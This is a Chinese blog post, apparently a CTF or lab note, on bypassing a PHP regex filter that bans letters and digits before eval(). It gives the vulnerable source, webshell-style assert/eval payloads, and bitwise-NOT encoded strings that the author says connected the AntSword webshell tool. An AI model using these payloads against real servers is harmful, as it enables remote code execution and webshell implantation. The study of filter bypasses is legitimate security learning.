ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

取反、异或绕过preg_match()过滤所有字母数字

2022-07-09 04:31:08  阅读:239  来源: 互联网

标签:变量 preg phpinfo REQUEST 取反 assert 异或 eval php


捞到代码,在本地搭建,源码(rce.php):

 <?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

?>

在研究bypass之前,先研究一个问题:eval(变量)

 

test.php:

<?php
$a=$_REQUEST[8];
@eval(8);
?>

想通过传参让页面输出phpinfo的界面,第一种方法就是?8=phpinfo();  ps:记得加分号

我尝试了以下?8=$_REQUEST[6];&6=phpinfo() 是不行的,在网上看过一篇WP说eval是PHP的语法组成的一员,所以eval()括号里一定是一个php预定义语法,不能直接是一个变量,说明eval(变量)的时候,变量不能直接写$_REQUEST[8]

而是要写成菜刀流量的形式:

?8=assert(eval($_REQUEST[8]))&8=phpinfo();                  ?8=assert(eval(phpinfo();))

assert()执行单行代码,eval()就是单行代码,经测试payload这样写是可行的。

 

继续看bypass问题:

法一:取反绕过:

<?php
echo urlencode(~'assert');
echo urlencode(~'eval($_REQUEST[8])');?>

结果:
%9E%8C%8C%9A%8D%8B
%9A%89%9E%93%D7%DB%A0%AD%BA%AE%AA%BA%AC%AB%A4%C7%A2%D

试了一下,连接蚁剑是可以的,但是我的蚁剑访问不了远程仓库不知道是什么情况。

 

法2:异或绕过

 

标签:变量,preg,phpinfo,REQUEST,取反,assert,异或,eval,php
来源: https://www.cnblogs.com/hackerone/p/16460066.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有